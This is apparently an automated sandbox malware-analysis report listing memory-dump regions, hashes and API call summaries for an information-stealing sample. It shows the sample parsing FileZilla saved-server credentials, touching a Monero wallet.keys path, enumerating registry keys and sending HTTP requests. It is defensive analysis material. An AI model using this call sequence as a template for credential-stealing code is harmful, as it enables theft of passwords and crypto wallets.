                                 • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$AllocCryptDataFreeUnprotect
                                • String ID:
                                • API String ID: 2068576380-0
                                • Opcode ID: ffe7a915d5bebb70528c30a576f952be32d4aba5977046bb2d038e2e78a2e85f
                                • Instruction ID: 3eb5b4595af52d95b152c596c588e24b5bab71743a603deae9d2a6d0626287e5
                                • Opcode Fuzzy Hash: ffe7a915d5bebb70528c30a576f952be32d4aba5977046bb2d038e2e78a2e85f
                                • Instruction Fuzzy Hash: 9511CCB8A00209DFDB44DF94D985AAEB7B9FF88300F104558E915A7390D774AE50CF61
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: B&u$q=#o
                                • API String ID: 0-4280379680
                                • Opcode ID: 3cd30f4f0e78b854eb6a9d6bfda0252c671afe61c9076c9e77831daa8b53e3b9
                                • Instruction ID: 80118766619a6e6f8d1b5e0657b07e163c4fe4c2195ea7ef7936c6150900e0f8
                                • Opcode Fuzzy Hash: 3cd30f4f0e78b854eb6a9d6bfda0252c671afe61c9076c9e77831daa8b53e3b9
                                • Instruction Fuzzy Hash: E9B228F3A082149FE304AE2DDC8567AFBE9EF94720F1A893DEAC4C7744E53558058792
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ]~$j%o?
                                • API String ID: 0-1545899973
                                • Opcode ID: 015beb45700c685f47ef5a101330abb5cca7391c353b794f6c47cad02367d070
                                • Instruction ID: daea267cd6cc7578f0245989e5442b3965622ff761940e39681dd610c619752a
                                • Opcode Fuzzy Hash: 015beb45700c685f47ef5a101330abb5cca7391c353b794f6c47cad02367d070
                                • Instruction Fuzzy Hash: 22623BF3A0C2009FE304AE2DEC9577AB7E5EF94620F1A853DEAC5C7744E63498058692
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                 • Associated: 00000000.00000002.1790675346.0000000000930000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009E1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.00000000009ED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000A12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790693635.0000000000B7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000DFA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1790838601.0000000000E34000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791061915.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791168481.0000000000FD8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1791184635.0000000000FD9000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: z^s$z^{
                                • API String ID: 0-297233388
                                • Opcode ID: 03cf9c6d5f28c175d55f51e6c6eb40f8578b72b148d754597a47dca6813b3859
                                • Instruction ID: ca73c2686da5bc912f5af8cf79bf3fe0f828be295c39392e657624da9a7f5e3a
                                • Opcode Fuzzy Hash: 03cf9c6d5f28c175d55f51e6c6eb40f8578b72b148d754597a47dca6813b3859
                                • Instruction Fuzzy Hash: EF414BB3A093044BE314AE2DECC577AB7D6EFD4710F2A863CDA8447784ED796909C246
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0Oy
                                • API String ID: 0-1359773364
                                • Opcode ID: fd24faf3a2c60b2eabdadd42076bdd8995e321bf10e3126034aecd5b7ca4dd32
                                • Instruction ID: 7f3da466fcd2b920b0110f55db2c919321fdd3c4b26c236d40cb12d0df162b29
                                • Opcode Fuzzy Hash: fd24faf3a2c60b2eabdadd42076bdd8995e321bf10e3126034aecd5b7ca4dd32
                                • Instruction Fuzzy Hash: 0B12E6F360C6009FD308AF29EC8577ABBD9EF94320F16893DE6C5C7744EA3558418696
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f66fe1218b399a4067fcbca75d65f3b1308c70e1e359139b2796a4bc4c8260e3
                                • Instruction ID: c1839d3cb1c5bf4d28d98bea022f88e45264f06366affd2f5afb8a47871cff34
                                • Opcode Fuzzy Hash: f66fe1218b399a4067fcbca75d65f3b1308c70e1e359139b2796a4bc4c8260e3
                                • Instruction Fuzzy Hash: 54F1E1F360C600AFE304AE2DEC8577ABBE5EF94760F16852DE6C483744EA3598058787
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 656a5c2cc6855b4f39f8a8000fc898dc3c1b7dab9a4e54e8b0a6bd6b7f710acc
                                • Instruction ID: 21a65d2f3cbcf66960f37cf1c9ce1ba463734c7803edca2724d2b99aef15a783
                                • Opcode Fuzzy Hash: 656a5c2cc6855b4f39f8a8000fc898dc3c1b7dab9a4e54e8b0a6bd6b7f710acc
                                • Instruction Fuzzy Hash: E16129F3A0C3049FE3046E29ECC576AB7D5EB44310F1A453DDAC893780EA7698418797
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000D1B000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e2cb16470e0bd647aa71c39aa19b7ac59989f941b73f004d0d0c71eec1e1522d
                                • Instruction ID: f4fdb03c54ea899eee353e2a66a08f63032b4729a12f2bf9d40bfeda6a15b0c5
                                • Opcode Fuzzy Hash: e2cb16470e0bd647aa71c39aa19b7ac59989f941b73f004d0d0c71eec1e1522d
                                • Instruction Fuzzy Hash: 904105F3508604AFE704AF2AEC8563AF7E6FBD4320F16493DEAC987340E67568558613
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790838601.0000000000B8E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3918f7dba2f272c2c6f81b16cc70c0ebf26159eb975116307d6a1790c3ce5967
                                • Instruction ID: a918a280de62e26030ce0f4afab13b3fb06990a38e89001c7983ca5303bc5f5d
                                • Opcode Fuzzy Hash: 3918f7dba2f272c2c6f81b16cc70c0ebf26159eb975116307d6a1790c3ce5967
                                • Instruction Fuzzy Hash: 8941E9F3A182148BF3046E28DC5537AB7D5EB94320F1B463CDAD48B7C4D93E58468786
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 00948DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00948E0B
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 009399C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009399EC
                                  • Part of subcall function 009399C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00939A11
                                  • Part of subcall function 009399C0: LocalAlloc.KERNEL32(00000040,?), ref: 00939A31
                                  • Part of subcall function 009399C0: ReadFile.KERNEL32(000000FF,?,00000000,0093148F,00000000), ref: 00939A5A
                                  • Part of subcall function 009399C0: LocalFree.KERNEL32(0093148F), ref: 00939A90
                                  • Part of subcall function 009399C0: CloseHandle.KERNEL32(000000FF), ref: 00939A9A
                                  • Part of subcall function 00948E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00948E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00950DBA,00950DB7,00950DB6,00950DB3), ref: 00940362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00940369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00940385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 009403CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 009403DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00940419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00940463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 0094051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 00940532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 0094054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00940562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00940571
                                • lstrcat.KERNEL32(?,url: ), ref: 00940580
                                • lstrcat.KERNEL32(?,00000000), ref: 00940593
                                • lstrcat.KERNEL32(?,00951678), ref: 009405A2
                                • lstrcat.KERNEL32(?,00000000), ref: 009405B5
                                • lstrcat.KERNEL32(?,0095167C), ref: 009405C4
                                • lstrcat.KERNEL32(?,login: ), ref: 009405D3
                                • lstrcat.KERNEL32(?,00000000), ref: 009405E6
                                • lstrcat.KERNEL32(?,00951688), ref: 009405F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00940604
                                • lstrcat.KERNEL32(?,00000000), ref: 00940617
                                • lstrcat.KERNEL32(?,00951698), ref: 00940626
                                • lstrcat.KERNEL32(?,0095169C), ref: 00940635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00950DB2), ref: 0094068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: fecfe53ec03e1d779e9bb3ccff19e4d909d12185ae4ab6a7d72a0d1c922b3f47
                                • Instruction ID: ce22bc98766df1d56eb70492b9351f9e15c08f24482d3693270c153719dcca2c
                                • Opcode Fuzzy Hash: fecfe53ec03e1d779e9bb3ccff19e4d909d12185ae4ab6a7d72a0d1c922b3f47
                                • Instruction Fuzzy Hash: 90D14C72950208ABDB04EBF0DD96FEE7339EFD4305F404518F506A7191EE74AA4ACB62
                                APIs
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                  • Part of subcall function 009347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00934839
                                  • Part of subcall function 009347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00934849
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 009359F8
                                • StrCmpCA.SHLWAPI(?,015BFC50), ref: 00935A13
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00935B93
                                • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,015BFB20,00000000,?,015BA4B0,00000000,?,00951A1C), ref: 00935E71
                                • lstrlen.KERNEL32(00000000), ref: 00935E82
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00935E93
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00935E9A
                                • lstrlen.KERNEL32(00000000), ref: 00935EAF
                                • lstrlen.KERNEL32(00000000), ref: 00935ED8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00935EF1
                                • lstrlen.KERNEL32(00000000,?,?), ref: 00935F1B
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00935F2F
                                • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00935F4C
                                • InternetCloseHandle.WININET(00000000), ref: 00935FB0
                                • InternetCloseHandle.WININET(00000000), ref: 00935FBD
                                • HttpOpenRequestA.WININET(00000000,015BFAC0,?,015BF098,00000000,00000000,00400100,00000000), ref: 00935BF8
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • InternetCloseHandle.WININET(00000000), ref: 00935FC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_930000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 874700897-2180234286
                                • Opcode ID: 3294485c800dd44a19ce456b2412b72e56366d2b6a473eef5f8c1ac07b5eeeaa
                                • Instruction ID: 27f17ab0ff22ac7c55710e8fdff140c6aea7496b548de2cb0abe16c9f4deb2fe
                                • Opcode Fuzzy Hash: 3294485c800dd44a19ce456b2412b72e56366d2b6a473eef5f8c1ac07b5eeeaa
                                • Instruction Fuzzy Hash: B112ED72860118AAEB15EBA0DC96FEEB378FF94704F504199F10A63191EF702E49CF65
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 00948B60: GetSystemTime.KERNEL32(00950E1A,015BA2A0,009505AE,?,?,009313F9,?,0000001A,00950E1A,00000000,?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 00948B86
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0093CF83
                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0093D0C7
                                • RtlAllocateHeap.NTDLL(00000000), ref: 0093D0CE
                                • lstrcat.KERNEL32(?,00000000), ref: 0093D208
                                • lstrcat.KERNEL32(?,00951478), ref: 0093D217
                                • lstrcat.KERNEL32(?,00000000), ref: 0093D22A
                                • lstrcat.KERNEL32(?,0095147C), ref: 0093D239
                                • lstrcat.KERNEL32(?,00000000), ref: 0093D24C
                                • lstrcat.KERNEL32(?,00951480), ref: 0093D25B
                                • lstrcat.KERNEL32(?,00000000), ref: 0093D26E
                                • lstrcat.KERNEL32(?,00951484), ref: 0093D27D
                                • lstrcat.KERNEL32(?,00000000), ref: 0093D290
                                • lstrcat.KERNEL32(?,00951488), ref: 0093D29F
                                • lstrcat.KERNEL32(?,00000000), ref: 0093D2B2
                                • lstrcat.KERNEL32(?,0095148C), ref: 0093D2C1
                                • lstrcat.KERNEL32(?,00000000), ref: 0093D2D4
                                • lstrcat.KERNEL32(?,00951490), ref: 0093D2E3
                                  • Part of subcall function 0094A820: lstrlen.KERNEL32(00934F05,?,?,00934F05,00950DDE), ref: 0094A82B
                                  • Part of subcall function 0094A820: lstrcpy.KERNEL32(00950DDE,00000000), ref: 0094A885
                                • lstrlen.KERNEL32(?), ref: 0093D32A
                                • lstrlen.KERNEL32(?), ref: 0093D339
                                  • Part of subcall function 0094AA70: StrCmpCA.SHLWAPI(015B8FC8,0093A7A7,?,0093A7A7,015B8FC8), ref: 0094AA8F
                                • DeleteFileA.KERNEL32(00000000), ref: 0093D3B4
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                • String ID:
                                • API String ID: 1956182324-0
                                • Opcode ID: 5b9eb717ac1dc086f40e56a2df2d7bd2224ce9fea9ed7a1d4918ce60a0833f3c
                                • Instruction ID: 5cd0861f62b1ef51534d98bfde21790751c306856fba50eb27e0d438a20bf11e
                                • Opcode Fuzzy Hash: 5b9eb717ac1dc086f40e56a2df2d7bd2224ce9fea9ed7a1d4918ce60a0833f3c
                                • Instruction Fuzzy Hash: 5CE14B72950108ABEB04EBA0DD96FEE7379FF94305F104158F106A71A1DE35AE4ACB62
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                  • Part of subcall function 0094A920: lstrcpy.KERNEL32(00000000,?), ref: 0094A972
                                  • Part of subcall function 0094A920: lstrcat.KERNEL32(00000000), ref: 0094A982
                                  • Part of subcall function 0094A8A0: lstrcpy.KERNEL32(?,00950E17), ref: 0094A905
                                  • Part of subcall function 0094A9B0: lstrlen.KERNEL32(?,015B9108,?,\Monero\wallet.keys,00950E17), ref: 0094A9C5
                                  • Part of subcall function 0094A9B0: lstrcpy.KERNEL32(00000000), ref: 0094AA04
                                  • Part of subcall function 0094A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0094AA12
                                • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,015BE638,00000000,?,0095144C,00000000,?,?), ref: 0093CA6C
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0093CA89
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0093CA95
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0093CAA8
                                • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0093CAD9
                                • StrStrA.SHLWAPI(?,015BE668,00950B52), ref: 0093CAF7
                                • StrStrA.SHLWAPI(00000000,015BE650), ref: 0093CB1E
                                • StrStrA.SHLWAPI(?,015BE990,00000000,?,00951458,00000000,?,00000000,00000000,?,015B9038,00000000,?,00951454,00000000,?), ref: 0093CCA2
                                • StrStrA.SHLWAPI(00000000,015BEAF0), ref: 0093CCB9
                                  • Part of subcall function 0093C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0093C871
                                  • Part of subcall function 0093C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0093C87C
                                • StrStrA.SHLWAPI(?,015BEAF0,00000000,?,0095145C,00000000,?,00000000,015B9078), ref: 0093CD5A
                                • StrStrA.SHLWAPI(00000000,015B92A8), ref: 0093CD71
                                  • Part of subcall function 0093C820: lstrcat.KERNEL32(?,00950B46), ref: 0093C943
                                  • Part of subcall function 0093C820: lstrcat.KERNEL32(?,00950B47), ref: 0093C957
                                  • Part of subcall function 0093C820: lstrcat.KERNEL32(?,00950B4E), ref: 0093C978
                                • lstrlen.KERNEL32(00000000), ref: 0093CE44
                                • CloseHandle.KERNEL32(00000000), ref: 0093CE9C
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                • String ID:
                                • API String ID: 3744635739-3916222277
                                • Opcode ID: ce14289c7315a3b46e34da6c70d8010f60eb17da772dc28add732b6f7607eb70
                                • Instruction ID: 5310751a08bd95390b18d5e861483b4c8136ff08a1241d6fac847410df49e4e0
                                • Opcode Fuzzy Hash: ce14289c7315a3b46e34da6c70d8010f60eb17da772dc28add732b6f7607eb70
                                • Instruction Fuzzy Hash: 23E10D71950108ABEB14EBA0DC92FEEB778EF94304F404159F506B7191EF306A8ACF66
                                APIs
                                  • Part of subcall function 0094A740: lstrcpy.KERNEL32(00950E17,00000000), ref: 0094A788
                                • RegOpenKeyExA.ADVAPI32(00000000,015BB648,00000000,00020019,00000000,009505B6), ref: 009483A4
                                • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00948426
                                • wsprintfA.USER32 ref: 00948459
                                • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0094847B
                                • RegCloseKey.ADVAPI32(00000000), ref: 0094848C
                                • RegCloseKey.ADVAPI32(00000000), ref: 00948499
                                  • Part of subcall function 0094A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0094A7E6
                                Strings
                                Yara matches
                                Similarity
                                • API ID: CloseOpenlstrcpy$Enumwsprintf
                                • String ID: - $%s\%s$?
                                • API String ID: 3246050789-3278919252
                                • Opcode ID: 346db1266baca3129a101abe9aaf57de24ce1cd22cbac6dbb5ad9bd8181cdf9a
                                • Instruction ID: d955f196088392a036599b3452d2b94729232716021fdcc36357fa3a3035eb42
